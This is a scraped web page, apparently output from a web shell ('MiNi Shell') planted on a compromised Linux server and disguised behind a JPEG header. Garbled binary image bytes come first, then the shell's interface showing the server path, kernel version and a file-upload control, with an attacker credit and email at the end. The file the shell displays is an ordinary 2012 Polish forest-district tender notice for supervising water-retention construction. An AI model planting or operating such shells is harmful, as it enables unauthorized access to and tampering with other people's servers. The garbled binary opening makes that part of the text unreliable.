JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120827/316486-N-2012.html

<p class="kh_header"><b>Syców: 2717 - 11/12 pełnienie nadzoru inwestorskiego w specjalności wodno - melioracyjnej
nad  robotami  budowlanymi polegającymi na wykonaniu obiektów małej retencji w leśnictwie Międzybórz obręb Kamień obiekty od nr 09-19-09-01 do nr 09-19-09-17 dla Nadleśnictwa Syców.</b><br>
<b>Numer ogłoszenia: 316486 - 2012; data zamieszczenia: 27.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Syców , ul. Kolejowa 14, 56-500 Syców, tel. (0-62) 7852127, faks (0-62) 7869032.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna nieposiadająca osobowości praawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 2717 - 11/12 pełnienie nadzoru inwestorskiego w specjalności wodno - melioracyjnej
nad  robotami  budowlanymi polegającymi na wykonaniu obiektów małej retencji w leśnictwie Międzybórz obręb Kamień obiekty od nr 09-19-09-01 do nr 09-19-09-17 dla Nadleśnictwa Syców..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego w specjalności wodno - melioracyjnej  nad robotami budowlanymi polegającymi na wykonaniu obiektów małej retencji w leśnictwie Międzybórz obręb Kamień obiekty od nr 09-19-09-01 do nr 09-19-09-17 dla Nadleśnictwa Syców.
Projekt współfinansowany przez Unię Europejską ze środków  Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 - Zwiększanie możliwości retencyjnych oraz przeciwdziałanie powodzi i suszy w ekosystemach leśnych na terenach nizinnych.
CPV - 71247000-1

Wykonawca w ramach realizacji zadania będzie pełnił nadzór inwestorski w specjalności wodno - melioracyjnej  nad robotami budowlanymi polegającymi na wykonaniu obiektów małej retencji w leśnictwie Międzybórz obręb Kamień /obiekty od nr 09-19-09-01 do nr 09-19-09-17/ dla Nadleśnictwa Syców na podstawie dokumentacji przetargowej  załączonej przez Zamawiającego do 
SIWZ 2710 - 8/12 (załącznik nr 7 do SIWZ ).
1.	Przewidywany termin realizacji umowy  na roboty budowlane do 30.05.2013 r. 
2.	Zakres czynności inspektora nadzoru inwestorskiego obejmuje w szczególności:
1)	nadzór i odbiór robót zgodnie z art. 25 Ustawy prawo budowlane (dz. U. 2006/156/1118  z późn. zmianami) i zgodnie z aktualnymi przepisami technicznymi oraz zgodnie z Projektem Budowlanym, Projektem Wykonawczym, a także zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót, 
2)	uczestnictwo w przekazaniu placu budowy,
3)	kontrola i odbiór wszystkich prac mogących powstać w trakcie robót związanych z realizacją przedmiotowego zadania,
4)	przygotowanie kompletu dokumentów do odbioru technicznego robót w celu zgłoszenia w organie nadzoru budowlanego zakończenia tych robót i uzyskania pozwolenia na użytkowanie,
5)	uczestnictwo w odbiorach częściowych po uprzednim przedstawieniu Zamawiającemu kompletu badań, pomiarów i dokumentacji potwierdzającej poprawność wykonanych robót, 
6)	wspólnie z przedstawicielem z ramienia Zamawiającego rozliczanie w zakresie kosztów wykonania robót a także przygotowanie kompletu dokumentów do rozliczenia finansowego budowy,
7)	udział w naradach/radach budowy organizowanych przez Wykonawcę na terenie budowy lub organizowanych przez Zamawiającego w jego siedzibie lub na terenie budowy,
8)	prowadzenie dokumentacji w formie papierowej i elektronicznej z czynności objętych przedmiotem zamówienia lub przydatnych Inwestorowi ze względów użytkowych bądź eksploatacyjnych wykonanych robót,
9)	współdziałanie z nadzorem autorskim/projektantami,
10)	zatwierdzanie wniosków Wykonawcy o dopuszczenie do wbudowania materiałów budowlanych, prefabrykatów oraz urządzeń przewidzianych do realizacji kontraktu. 
11)	przed rozpoczęciem robót budowlanych, Inspektor nadzoru dokona sprawdzenia projektu budowlanego, projektów wykonawczych, Szczegółowych Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych w zakresie sprawowanego nadzoru. Ewentualne błędy, nieścisłości, rozbieżności itp. Inspektor wyjaśni z projektantami. Zmiany dotyczące wyżej wymienionych dokumentów wyjaśnione i ustalone z projektantami Inspektor przedkłada do akceptacji Zamawiającemu.
12)	Inspektor nadzoru we własnym zakresie w ramach wynagrodzenia umownego zapewni:
a.	transport na potrzeby własne na teren i terenie budowy,
b.	niezbędny sprzęt oraz wyposażenie własne na terenie budowy,
c.	środki łączności (telefon, fax, Internet),
13)	inspektor nadzoru podejmuje i odpowiada za wszelkie decyzje w nadzorowanym zadaniu, które dotyczą udzielenia Wykonawcy robót informacji, wyjaśnień i wskazówek dotyczących zadania, wnioskowanie, wraz z odpowiednim uzasadnieniem, do Zamawiającego w sprawach dotyczących:
a.	wprowadzenia niezbędnych zmian w dokumentacji technicznej i uzyskania zgody projektanta na zmiany,
b.	przeprowadzenia niezbędnych ekspertyz i badań technicznych. 
c.	uzyskiwania od projektanta wyjaśnień w sprawach dotyczących projektu i zawartych w nim rozwiązań,
d.	rozpoznania i przedstawienia do akceptacji Zamawiającemu zaopiniowaną dokumentację projektową i specyfikacje techniczne na zgłoszone przez Wykonawcę roboty zamienne konieczne a wynikające np. ze zmiany przepisów,
e.	wstrzymania robót w wypadku prowadzenie ich niezgodnie z zamówieniem i przepisami BHP,
f.	żądania wykonania badań dodatkowych przez Wykonawcę, a przede wszystkim:
a)	akceptowania materiałów zgodnych z wymaganiami Specyfikacji Technicznych ze wskazanych przez Wykonawcę źródeł,
b)	podejmowania decyzji o dopuszczeniu do użycia materiałów posiadających atest producenta,
c)	akceptowania receptur i technologii zgodnie z wymaganiami Specyfikacji Technicznych,
d)	kontrolowania sposobu składowania i przechowywania materiałów oraz uporządkowania miejsc składowania po zakończeniu robót,
e)	zlecania Wykonawcy dodatkowych badań materiałów budzących wątpliwość co do jakości.
g.	akceptowania urządzeń i sprzętu pomiarowego,
h.	sprawdzania wykonania robót i powiadamiania Wykonawcy o wykrytych wadach oraz poświadczenia usunięcia wad przez Wykonawcę a także ustalania rodzaju i zakresu koniecznych do wykonania robót poprawkowych,
i.	dokonania odbioru technicznego: gotowych elementów, robót zanikających, ulegających zakryciu,  
j.	poświadczenia terminu zakończenia nadzorowanych robót,
k.	stwierdzenia zakończenia robót, sprawdzenia kompletności i prawidłowości operatu kolaudacyjnego i przedłożenia do akceptacji Zamawiającemu, w celu ustalenia terminu ostatecznego odbioru robót oraz uczestniczenia w odbiorze ,
l.	uzgadniania z Zamawiającym i Projektantem zakresu ewentualnych koniecznych robót zamiennych i przygotowanie dla tych prac wniosku uzasadniającego wraz z kalkulacją kosztów,
m.	przedkładanie do zatwierdzenia Zamawiającemu Protokołów Konieczności i Protokołów z Negocjacji na roboty zamienne,
n.	przedkładanie do rozstrzygnięć Zamawiającemu spraw spornych z Wykonawcą 
ze stosowną opinią oraz uzasadnieniem,
14)	Wnioskowanie do Zamawiającego o powołanie nadzoru autorskiego,
15)	Akceptacja zgłoszonego przez Wykonawcę zasadniczego ukończenia robót wraz z wykazem robót do zakończenia oraz wad i usterek,
16)	Nadzór nad sporządzeniem przez Wykonawcę dokumentacji powykonawczej,
17)	Uczestnictwo w pracach Komisji Odbioru Końcowego zwołanej przez Zamawiającego,
18)	Wykonywanie dokumentacji fotograficznej (w technice cyfrowej) z postępu robót.
19)	Współpraca z branżowymi służbami doradczymi i nadzorem zabezpieczonymi dodatkowo przez Zamawiającego jeżeli taki zostanie powołany,
20)	Inspektor nadzoru, będzie co miesiąc sporządzał raport z wykonywanych czynności. Raport miesięczny należy przedłożyć Zamawiającemu w terminie do 7 dni od zakończenia miesiąca. 
21)	Koordynowanie zadania - dbanie o postęp robót, utrzymywanie bieżącego kontaktu telefonicznego i mailowego z Zamawiającym, przedkładanie Zamawiającemu propozycji rozwiązań dotyczących problemów powstałych w trakcie realizacji zadania (również problemów technicznych). 
3.	Za pełnienie funkcji inspektora nadzoru inwestorskiego Zamawiający przewiduje wynagrodzenie  ryczałtowe. Wynagrodzenie inspektora nadzoru nie będzie podlegać:            a) rewaloryzacji                                                                                                                               b) zmianie - wzrostu wynagrodzenia w przypadku przedłużenia realizacji terminu wykonania robót budowlanych. W przypadku przedłużenia realizacji zadania- robót budowlanych - nadzór będzie prowadzony za cenę przedstawioną w złożonej ofercie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>4.1. 	  Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy. 
4.2. 	Zamówienie uzupełniające polega na powtórzeniu tego samego rodzaju zamówień, co w zamówieniu podstawowym i dotyczy przedmiotu zamówienia w nim określonego.
4.3. 	Zamówienie uzupełniające może być udzielone w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy robót budowlanych. 
4.4. 	Zamówienie uzupełniające nie może być większe niż 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania niezbędnej wiedzy i doświadczenia Zamawiający uzna wykonanie w okresie ostatnich 3 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonania min 2 zadań z zakresu nadzoru inwestorskiego w specjalności wodno - melioracyjnej  realizowanych przez okres min. 4 miesięcy każde oraz potwierdzą, że usługi te  zostały wykonane należycie. 
1.3. Zamawiający dokona oceny spełnienia przez Wykonawców wyżej wskazanych warunków na podstawie danych i informacji zawartych w żądanych do załączenia do oferty dokumentach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	dysponują osobą/osobami zdolnymi do wykonania zamówienia posiadającymi kwalifikacje niezbędne do wykonania zamówienia, tj. min 1 osobą do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności wodno - melioracyjnej  bez ograniczeń lub odpowiadające mu uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów.
b.	winni oświadczyć, że osoba/osoby, która będzie uczestniczyć w wykonaniu zamówienia, posiada wymagane uprawnienia jeżeli ustawy nakładają posiadanie takich uprawnień.

1.3. Zamawiający dokona oceny spełnienia przez Wykonawców wyżej wskazanych warunków na podstawie danych i informacji zawartych w żądanych do załączenia do oferty dokumentach.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty (referencje lub inny dokument) od poprzednich zamawiających potwierdzający, że zadania wykazane w załączniku nr 4 do SIWZ, zostały wykonane należycie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lasypanstwowe.poznan.pl/sycow<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.lasypanstwowe.poznan.pl/sycow.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2012 godzina 13:00, miejsce: 10.1. Ofertę należy złożyć w zamkniętej kopercie zgodnie z pkt 1.11 Rozdział III w siedzibie Nadleśnictwa Syców, ul. Kolejowa 14, 56-500 Syców (sekretariat - I piętro pokój nr 5) nie później niż do dn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków  Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 - Zwiększanie możliwości retencyjnych oraz przeciwdziałanie powodzi
i suszy w ekosystemach leśnych na terenach nizinnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com